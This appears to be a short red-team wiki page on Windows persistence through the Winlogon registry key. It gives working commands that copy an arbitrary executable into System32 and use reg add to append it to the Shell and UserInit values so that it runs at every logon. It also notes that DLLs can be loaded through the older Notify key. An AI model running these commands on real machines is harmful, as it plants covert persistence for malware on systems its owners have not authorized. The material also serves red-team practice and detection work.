WinLogon is a component thats handles various "login" activities like Logon, Logoffs, loading user profiles etc. This is managed by registry keys, and we can use these registry keys for persistence.

WinLogon has 2 registry keys values we can use for persistence, shell and UserInit values.

Shell gets executed at login time, and UserInit initializes the users session and is executed by winlogon.


copy c:\executable.exe c:\windows\system32
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Shell" /T REG_SZ /D "explorer.exe,executable.exe" /F


reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "UserInit" /T REG_SZ /D "C:\Windows\system32\userinit.exe,c:\windows\system32\executable.exe" /F 


The notify registry key is found in older OS's and points to a notification package DLL file which handles WinLogon events. We can add DLL entries under this key to cause it to be loaded during logon.


Last updated